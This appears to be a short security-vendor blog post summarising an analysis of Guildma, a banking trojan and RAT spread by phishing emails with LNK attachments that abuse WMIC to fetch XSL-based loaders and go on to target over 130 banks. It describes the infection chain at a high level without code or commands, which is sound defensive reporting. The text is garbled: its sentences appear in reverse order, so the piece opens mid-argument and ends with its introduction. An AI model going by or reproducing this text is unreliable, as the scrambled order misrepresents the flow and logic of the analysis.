However, we have protected more than 26,000 Avast users from 155,000 Guildma infection attempts, globally, this year. Originally, the campaign targeted Brazilian users and services, by spreading tailored phishing emails. The malware is then active and waits for commands from the C&C server and/or specific user interactions, such as opening a webpage of one of the targeted banks. The XSL file downloads all of Guildma’s modules and executes a first stage loader, which loads the rest of the modules. When a user opens the malicious LNK file, it abuses the Windows Management Instrumentation Command-line tool and silently downloads a malicious XSL file. The campaign spreads via phishing emails posing as invoices, tax reports, invitations and similar types of messages containing a ZIP archive attachment with a malicious LNK file. With these patterns, we have been able to track the entire campaign with high accuracy, even if some parts of the malware or modules have been changed. The malware authors have used large amounts of domains, various infection and stealing techniques, and programming languages (Delphi, JS, VBS.) during Guildma’s long existence, but, on the other hand, they also used the same or very similar code patterns like encryption algorithm and seeds, URL path format, variables or file names. Our analysis provides detailed information about all of Guildma’s stages, module functionality, C&C servers, commands and a long list of targeted services and applications, as well as a description of the evolution of features. Malware researchers have done some analysis of Guildma in the past, but only focused on the first stages of the malware. We estimate that the first versions of Guildma were created in 2015, based on the available clues in our analysis and previous research conducted on Guildma. The cybercriminals behind Guildma have primarily focused on targeting Brazilian users and services, but since May 2019 they have expanded their target pool and are now targeting more than 130 banks and 75 other web services around the world. Guildma is powerful combination of a RAT (remote access tool), spyware, password stealer and banker malware, mainly distributed via malicious attachments in phishing email campaigns. For several months now, we have been tracking malware called Guildma.
0 Comments
Leave a Reply. |